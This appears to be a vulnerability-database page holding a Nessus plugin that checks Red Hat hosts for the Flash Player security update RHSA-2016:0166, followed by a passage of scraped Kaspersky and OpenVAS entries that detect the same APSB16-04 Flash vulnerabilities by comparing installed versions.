ID: REDHAT-RHSA-2016-0166.NASL
Type: nessus
Reporter: This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified: 2021-02-02T00:00:00

Description

An updated Adobe Flash Player package that fixes multiple security
issues is now available for Red Hat Enterprise Linux 5 and 6
Supplementary.

Red Hat Product Security has rated this update as having Critical
security impact. Common Vulnerability Scoring System (CVSS) base
scores, which give detailed severity ratings, are available for each
vulnerability from the CVE links in the References section.

The flash-plugin package contains a Mozilla Firefox compatible Adobe
Flash Player web browser plug-in.

This update fixes multiple vulnerabilities in Adobe Flash Player.
These vulnerabilities, detailed in the Adobe Security Bulletin
APSB16-04 listed in the References section, could allow an attacker to
create a specially crafted SWF file that would cause flash-plugin to
crash, execute arbitrary code, or disclose sensitive information when
the victim loaded a page containing the malicious SWF content.
(CVE-2016-0964, CVE-2016-0965, CVE-2016-0966, CVE-2016-0967,
CVE-2016-0968, CVE-2016-0969, CVE-2016-0970, CVE-2016-0971,
CVE-2016-0972, CVE-2016-0973, CVE-2016-0974, CVE-2016-0975,
CVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,
CVE-2016-0980, CVE-2016-0981, CVE-2016-0982, CVE-2016-0983,
CVE-2016-0984, CVE-2016-0985)

All users of Adobe Flash Player should install this updated package,
which upgrades Flash Player to version 11.2.202.569.

#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Red Hat Security Advisory RHSA-2016:0166. The text
# itself is copyright (C) Red Hat, Inc.
#
include("compat.inc");
if (description)
{
  script_id(88690);
  script_version("2.22");
  script_cvs_date("Date: 2019/10/24 15:35:41");

  script_cve_id("CVE-2016-0964", "CVE-2016-0965", "CVE-2016-0966", "CVE-2016-0967", "CVE-2016-0968", "CVE-2016-0969", "CVE-2016-0970", "CVE-2016-0971", "CVE-2016-0972", "CVE-2016-0973", "CVE-2016-0974", "CVE-2016-0975", "CVE-2016-0976", "CVE-2016-0977", "CVE-2016-0978", "CVE-2016-0979", "CVE-2016-0980", "CVE-2016-0981", "CVE-2016-0982", "CVE-2016-0983", "CVE-2016-0984", "CVE-2016-0985");
  script_xref(name:"RHSA", value:"2016:0166");

  script_name(english:"RHEL 5 / 6 : flash-plugin (RHSA-2016:0166)");
  script_summary(english:"Checks the rpm output for the updated package");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote Red Hat host is missing a security update."
  );
  script_set_attribute(
    attribute:"description",
    value:
"An updated Adobe Flash Player package that fixes multiple security
issues is now available for Red Hat Enterprise Linux 5 and 6
Supplementary.
Red Hat Product Security has rated this update as having Critical
security impact. Common Vulnerability Scoring System (CVSS) base
scores, which give detailed severity ratings, are available for each
vulnerability from the CVE links in the References section.
The flash-plugin package contains a Mozilla Firefox compatible Adobe
Flash Player web browser plug-in.
This update fixes multiple vulnerabilities in Adobe Flash Player.
These vulnerabilities, detailed in the Adobe Security Bulletin
APSB16-04 listed in the References section, could allow an attacker to
create a specially crafted SWF file that would cause flash-plugin to
crash, execute arbitrary code, or disclose sensitive information when
the victim loaded a page containing the malicious SWF content.
(CVE-2016-0964, CVE-2016-0965, CVE-2016-0966, CVE-2016-0967,
CVE-2016-0968, CVE-2016-0969, CVE-2016-0970, CVE-2016-0971,
CVE-2016-0972, CVE-2016-0973, CVE-2016-0974, CVE-2016-0975,
CVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,
CVE-2016-0980, CVE-2016-0981, CVE-2016-0982, CVE-2016-0983,
CVE-2016-0984, CVE-2016-0985)
All users of Adobe Flash Player should install this updated package,
which upgrades Flash Player to version 11.2.202.569."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/errata/RHSA-2016:0166"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2016-0978"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2016-0979"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2016-0976"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2016-0977"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2016-0974"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2016-0975"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2016-0972"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2016-0973"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2016-0970"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2016-0971"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2016-0985"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2016-0984"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2016-0983"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2016-0982"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2016-0981"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2016-0980"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2016-0969"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2016-0968"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2016-0965"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2016-0964"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2016-0967"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2016-0966"
  );
  script_set_attribute(
    attribute:"solution",
    value:"Update the affected flash-plugin package."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:flash-plugin");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:5");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:6");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:6.7");

  script_set_attribute(attribute:"vuln_publication_date", value:"2016/02/10");
  script_set_attribute(attribute:"patch_publication_date", value:"2016/02/10");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/02/11");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Red Hat Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("rpm.inc");

# Stop with an audit message unless local checks are enabled and the host is RHEL 5.x or 6.x.
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat");
os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat");
os_ver = os_ver[1];
if (! preg(pattern:"^(5|6)([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 5.x / 6.x", "Red Hat " + os_ver);

# The collected RPM list and a supported CPU architecture are both required.
if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu);

# Use the yum updateinfo data when the scan collected it.
yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo");
if (!empty_or_null(yum_updateinfo))
{
  rhsa = "RHSA-2016:0166";
  yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);
  if (!empty_or_null(yum_report))
  {
    security_report_v4(
      port     : 0,
      severity : SECURITY_HOLE,
      extra    : yum_report
    );
    exit(0);
  }
  else
  {
    audit_message = "affected by Red Hat security advisory " + rhsa;
    audit(AUDIT_OS_NOT, audit_message);
  }
}
else
{
  # Otherwise check the installed flash-plugin RPM against the fixed build for each release.
  flag = 0;
  if (rpm_check(release:"RHEL5", reference:"flash-plugin-11.2.202.569-1.el5")) flag++;

  if (rpm_check(release:"RHEL6", reference:"flash-plugin-11.2.202.569-1.el6_7")) flag++;

  if (flag)
  {
    # Appended to the report: Adobe-released packages are versioned similarly and can collide in detection.
    flash_plugin_caveat = '\n' +
      'NOTE: This vulnerability check only applies to RedHat released\n' +
      'versions of the flash-plugin package. This check does not apply to\n' +
      'Adobe released versions of the flash-plugin package, which are\n' +
      'versioned similarly and cause collisions in detection.\n\n' +

      'If you are certain you are running the Adobe released package of\n' +
      'flash-plugin and are running a version of it equal or higher to the\n' +
      'RedHat version listed above then you can consider this a false\n' +
      'positive.\n';
    security_report_v4(
      port     : 0,
      severity : SECURITY_HOLE,
      extra    : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat
    );
    exit(0);
  }
  else
  {
    tested = pkg_tests_get();
    if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
    else audit(AUDIT_PACKAGE_NOT_INSTALLED, "flash-plugin");
  }
}
"CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "### *Detect date*:\n02/09/2016\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Adobe Flash Player & AIR. Malicious users can exploit these vulnerabilities to execute arbitrary code.\n\n### *Affected products*:\nAdobe Flash Player versions earlier than 20.0.0.306 \nAdobe Flash Player Extended Support Release versions earlier than 18.0.0.329 \nAdobe Flash Player for Linux versions earlier than 11.2.202.569 \nAdobe AIR versions earlier than 20.0.0.260\n\n### *Solution*:\nUpdate to the latest version \n[Get Flash Player](<https://get.adobe.com/flashplayer/>) \n[Get AIR](<https://get.adobe.com/air/>)\n\n### *Original advisories*:\n[Adobe security bulletin](<https://helpx.adobe.com/security/products/flash-player/apsb16-04.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Adobe Flash Player ActiveX](<https://threats.kaspersky.com/en/product/Adobe-Flash-Player-ActiveX/>)\n\n### *CVE-IDS*:\n[CVE-2016-0985](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0985>)9.3Critical \n[CVE-2016-0983](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0983>)10.0Critical \n[CVE-2016-0984](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0984>)10.0Critical \n[CVE-2016-0981](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0981>)10.0Critical \n[CVE-2016-0982](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0982>)10.0Critical \n[CVE-2016-0964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0964>)10.0Critical \n[CVE-2016-0965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0965>)10.0Critical \n[CVE-2016-0966](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0966>)10.0Critical \n[CVE-2016-0967](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0967>)10.0Critical 
\n[CVE-2016-0968](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0968>)10.0Critical \n[CVE-2016-0969](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0969>)10.0Critical \n[CVE-2016-0970](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0970>)10.0Critical \n[CVE-2016-0972](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0972>)10.0Critical \n[CVE-2016-0971](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0971>)10.0Critical \n[CVE-2016-0976](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0976>)10.0Critical \n[CVE-2016-0975](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0975>)9.3Critical \n[CVE-2016-0974](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0974>)10.0Critical \n[CVE-2016-0973](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0973>)9.3Critical \n[CVE-2016-0980](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0980>)10.0Critical \n[CVE-2016-0979](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0979>)10.0Critical \n[CVE-2016-0978](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0978>)10.0Critical \n[CVE-2016-0977](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0977>)10.0Critical\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 41, "modified": "2020-06-18T00:00:00", "published": "2016-02-09T00:00:00", "id": "KLA10756", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10756", "title": "\r KLA10756Arbitrary code execution in Adobe Flash Player & AIR ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-10-24T21:26:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", 
"CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-10-23T00:00:00", "published": "2016-02-10T00:00:00", "id": "OPENVAS:1361412562310806867", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806867", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities -01 Feb16 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities -01 Feb16 (Linux)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806867\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\",\n \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\",\n \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\",\n \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\",\n \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\",\n \"CVE-2016-0984\", \"CVE-2016-0985\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-02-10 13:23:06 +0530 (Wed, 10 Feb 2016)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities -01 Feb16 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Multiple memory corruption vulnerabilities\n\n - Multiple use-after-free vulnerabilities\n\n - A heap buffer overflow vulnerability\n\n - A type confusion vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will\n potentially allow an attacker to take control of the affected system,\n which 
could lead to code execution.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 11.2.202.569 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 11.2.202.569 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.2.202.569\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"11.2.202.569\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:16:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "modified": "2019-10-23T00:00:00", "published": "2017-03-18T00:00:00", "id": "OPENVAS:1361412562310810659", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810659", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Security Update 
(apsb16-04) - Windows", "sourceData": "############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Security Update (apsb16-04) - Windows\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810659\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\",\n \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\",\n \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\",\n \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\",\n \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\",\n \"CVE-2016-0984\", \"CVE-2016-0985\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", 
value:\"2017-03-18 15:25:30 +0530 (Sat, 18 Mar 2017)\");\n script_name(\"Adobe Flash Player Within Google Chrome Security Update (apsb16-04) - Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Multiple memory corruption vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - A heap buffer overflow vulnerability.\n\n - A type confusion vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will potentially\n allow an attacker to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player for chrome versions\n before 20.0.0.306 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player for chrome\n version 20.0.0.306 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"20.0.0.306\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"20.0.0.306\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:16:51", 
"bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "modified": "2019-10-23T00:00:00", "published": "2017-03-18T00:00:00", "id": "OPENVAS:1361412562310810661", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810661", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Security Update (apsb16-04) - Linux", "sourceData": "############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Security Update (apsb16-04) - Linux\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810661\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\",\n \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\",\n \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\",\n \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\",\n \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\",\n \"CVE-2016-0984\", \"CVE-2016-0985\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-18 15:18:57 +0530 (Sat, 18 Mar 2017)\");\n script_name(\"Adobe Flash Player Within Google Chrome Security Update (apsb16-04) - Linux\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Multiple memory corruption vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - A heap buffer overflow vulnerability.\n\n - A type confusion vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will potentially\n allow an attacker to execute arbitrary 
code.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player for chrome versions\n before 20.0.0.306 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player for chrome\n version 20.0.0.306 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/Lin/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"20.0.0.306\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"20.0.0.306\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:24:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-10-23T00:00:00", "published": "2016-02-10T00:00:00", "id": "OPENVAS:1361412562310806865", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806865", "type": "openvas", 